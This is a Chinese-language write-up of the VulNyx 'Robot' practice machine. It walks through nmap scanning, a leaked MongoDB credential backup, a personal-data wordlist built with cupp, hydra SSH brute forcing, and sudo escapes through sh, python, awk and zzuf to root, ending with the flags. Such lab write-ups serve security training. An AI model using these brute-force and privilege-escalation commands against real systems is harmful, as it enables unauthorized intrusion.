Vlx_Robot

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 15:58 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00079s latency).
MAC Address: 08:00:27:75:F0:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.54
Host is up (0.00061s latency).
MAC Address: 08:00:27:63:FD:83 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.50 seconds

靶机IP：192.168.2.54

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.54                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 15:59 +0800
Nmap scan report for 192.168.2.54
Host is up (0.00093s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
27017/tcp open  mongod
MAC Address: 08:00:27:63:FD:83 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 12.66 seconds

开放端口：22、80、27017

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,27017 192.168.2.54
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 16:00 +0800
Nmap scan report for 192.168.2.54
Host is up (0.0011s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp    open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Hello Friend
|_http-server-header: Apache/2.4.56 (Debian)
27017/tcp open  mongodb MongoDB 5.0.21 4.1.1 - 5.0
| mongodb-databases: 
|   code = 13
|   errmsg = command listDatabases requires authentication
|   codeName = Unauthorized
|_  ok = 0.0
| mongodb-info: 
|   MongoDB Build info
|     storageEngines
|       0 = devnull
|       2 = wiredTiger
|       1 = ephemeralForTest
|     version = 5.0.21
|     sysInfo = deprecated
|     modules
|     ok = 1.0
|     maxBsonObjectSize = 16777216
|     versionArray
|       0 = 5
|       3 = 0
|       2 = 21
|       1 = 0
|     allocator = tcmalloc
|     gitVersion = 4fad44a858d8ee2d642566fc8872ef410f6534e4
|     bits = 64
|     javascriptEngine = mozjs
|     openssl
|       running = OpenSSL 1.1.1n  15 Mar 2022
|       compiled = OpenSSL 1.1.1n  15 Mar 2022
|     buildEnvironment
|       linkflags = -Wl,--fatal-warnings -pthread -Wl,-z,now -fuse-ld=gold -fstack-protector-strong -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,--compress-debug-sections=none -Wl,-z,origin -Wl,--enable-new-dtags
|       ccflags = -Werror -include mongo/platform/basic.h -ffp-contract=off -fasynchronous-unwind-tables -ggdb -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -fno-omit-frame-pointer -fno-strict-aliasing -O2 -march=sandybridge -mtune=generic -mprefer-vector-width=128 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -Wa,--nocompress-debug-sections -fno-builtin-memcmp
|       cc = /opt/mongodbtoolchain/v3/bin/gcc: gcc (GCC) 8.5.0
|       target_arch = x86_64
|       cxxflags = -Woverloaded-virtual -Wno-maybe-uninitialized -fsized-deallocation -std=c++17
|       cppdefines = SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS
|       distarch = x86_64
|       distmod = debian10
|       target_os = linux
|       cxx = /opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.5.0
|     debug = false
|   Server status
|     code = 13
|     errmsg = command serverStatus requires authentication
|     codeName = Unauthorized
|_    ok = 0.0
MAC Address: 08:00:27:63:FD:83 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.51 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.54                          
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-21 16:00 +0800
Nmap scan report for 192.168.2.54
Host is up (0.0010s latency).
All 100 scanned ports on 192.168.2.54 are in ignored states.
Not shown: 54 closed udp ports (port-unreach), 46 open|filtered udp ports (no-response)
MAC Address: 08:00:27:63:FD:83 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.29 seconds

二、WEB渗透

1、80网站

访问80端口，是一张图片

将图片下载到本地，使用exiftool查看图片信息

┌──(root㉿kali)-[/tmp]
└─# exiftool image.jpg                            
ExifTool Version Number         : 13.44
File Name                       : image.jpg
Directory                       : .
File Size                       : 682 kB
File Modification Date/Time     : 2023:10:06 20:50:53+08:00
File Access Date/Time           : 2026:01:21 16:20:13+08:00
File Inode Change Date/Time     : 2026:01:21 16:19:05+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Comment                         : B4ckUp_3LLi0t/
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1920x1080
Megapixels                      : 2.1

发现存在目录B4ckUp_3LLi0t/，进行访问，发现还是一张图片 继续将文件下载下来，没有发现有用的信息，尝试进行目录扫描

┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://192.168.2.54/B4ckUp_3LLi0t/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.54/B4ckUp_3LLi0t/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              js,php,txt,html,bak,md,db
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 481]
connect.bak          (Status: 200) [Size: 266]

找到一个备份文件connect.bak，进行下载

┌──(root㉿kali)-[/tmp]
└─# cat connect.bak     
<?php

$client = new MongoDB\Client(
    'mongodb://127.0.0.1:27017'
    [
        'username' => 'mongo',
        'password' => 'm0ng0P4zz',
        'ssl' => true,
        'replicaSet' => 'myReplicaSet',
        'authSource' => 'admin',
        'db' => 'elliot',
    ],
);

发现是mongodb数据库的账号和密码

2、27017-MongoDB

访问27017端口，显示看起来你正试图通过原生驱动程序端口的HTTP访问MongoDB。

经过信息扫描，发现MongoDB的版本为5.0.21

三、MongoDB

使用MongoDB的账号和密码进行连接

┌──(root㉿kali)-[~/miaosec]
└─# mongo --host 192.168.2.54 -u mongo -p m0ng0P4zz elliot 
MongoDB shell version v7.0.14
connecting to: mongodb://192.168.2.54:27017/elliot?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("46152d63-89ed-44e9-8b99-d538e661f1ee") }
MongoDB server version: 5.0.21
WARNING: shell and server versions do not match
================
Warning: the "mongo" shell has been superseded by "mongosh",
which delivers improved usability and compatibility.The "mongo" shell has been deprecated and will be removed in
an upcoming release.
For installation instructions, see
https://docs.mongodb.com/mongodb-shell/install/
================
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
        https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
        https://community.mongodb.com
> 

查看数据库信息

> show dbs
elliot  0.000GB
> use elliot
switched to db elliot
> show collections
elliot
> db.elliot.find()
{ "_id" : ObjectId("651fdd9171f44c265b976d17"), "FirstName" : "Elliot", "Surname" : "Alderson", "Nickname" : "MrRobot", "Birthdate" : "17091986" }

根据拿到的信息，提示我们去生成一个字典，使用cupp进行生成

┌──(root㉿kali)-[~/miaosec]
└─# cupp -i
/usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ '
  print("      \                     # User")
/usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ '
  print("       \   \033[1;31m,__,\033[1;m             # Passwords")
/usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ '
  print("        \  \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m         # Profiler")
/usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ '
  print("           \033[1;31m(__)    )\ \033[1;m  ")
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: Elliot
> Surname: Alderson
> Nickname: MrRobot
> Birthdate (DDMMYYYY): 17091986


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: 
> Do you want to add special chars at the end of words? Y/[N]: y
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to elliot.txt, counting 4536 words.
[+] Now load your pistolero with elliot.txt and shoot! Good luck!

四、获取Elliot权限

根据生成好的字典，进行ssh爆破

┌──(root㉿kali)-[~/miaosec]
└─# hydra -t 64 -l elliot  -P ./elliot.txt ssh://192.168.2.54 -F -I
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-21 17:30:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 4536 login tries (l:1/p:4536), ~71 tries per task
[DATA] attacking ssh://192.168.2.54:22/
[STATUS] 536.00 tries/min, 536 tries in 00:01h, 4038 to do in 00:08h, 26 active
[STATUS] 454.00 tries/min, 1362 tries in 00:03h, 3213 to do in 00:08h, 25 active
[STATUS] 414.14 tries/min, 2899 tries in 00:07h, 1678 to do in 00:05h, 23 active
[22][ssh] host: 192.168.2.54   login: elliot   password: toillE71986
[STATUS] attack finished for 192.168.2.54 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-21 17:39:22

找到用户elliot的SSH密码toillE71986

获取到用户elliot权限

┌──(root㉿kali)-[~/miaosec]
└─# ssh elliot@192.168.2.54                      
The authenticity of host '192.168.2.54 (192.168.2.54)' can't be established.
ED25519 key fingerprint is: SHA256:3dqq7f/jDEeGxYQnF2zHbpzEtjjY49/5PvV5/4MMqns
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.54' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
elliot@192.168.2.54's password: 
elliot@robot:~$ id
uid=1000(elliot) gid=1000(elliot) grupos=1000(elliot)

五、权限提升

1、获取darlene权限

查看sudo -l

elliot@robot:~$ sudo -l
Matching Defaults entries for elliot on robot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on robot:
    (darlene) NOPASSWD: /usr/bin/sh

获取到用户darlene权限

elliot@robot:~$ sudo -u darlene /usr/bin/sh
$ id
uid=1001(darlene) gid=1001(darlene) grupos=1001(darlene)
$ bash
darlene@robot:/home/elliot$ 

2、获取angela权限

查看sudo -l

darlene@robot:/home/elliot$ sudo -l
Matching Defaults entries for darlene on robot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User darlene may run the following commands on robot:
    (angela) NOPASSWD: /usr/bin/python3

获取到用户angela权限

darlene@robot:/home/elliot$ sudo -u angela /usr/bin/python3  -c 'import os; os.execl("/bin/sh", "sh")'
$ bash
angela@robot:/home/elliot$ id
uid=1002(angela) gid=1002(angela) grupos=1002(angela)

3、获取tyrell权限

查看sudo -l

angela@robot:/home/elliot$ sudo -l
Matching Defaults entries for angela on robot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User angela may run the following commands on robot:
    (tyrell) NOPASSWD: /usr/bin/awk

获取到用户tyrell权限

angela@robot:/home/elliot$ sudo -u tyrell /usr/bin/awk 'BEGIN {system("/bin/sh")}'
$ bash
tyrell@robot:/home/elliot$ id
uid=1003(tyrell) gid=1003(tyrell) grupos=1003(tyrell)

4、获取root权限

查看sudo -l

tyrell@robot:/home/elliot$ sudo -l
Matching Defaults entries for tyrell on robot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tyrell may run the following commands on robot:
    (root) NOPASSWD: /usr/bin/zzuf

可以直接执行sh

获取到root权限

tyrell@robot:/home/elliot$ sudo /usr/bin/zzuf  /bin/sh
id
uid=0(root) gid=0(root) grupos=0(root)

六、查看FLAG

cat /root/root.txt /home/elliot/user.txt
59d16127fbdecc2832a98726efe3af85
40f8c240d5151fa312d6f372b636a12a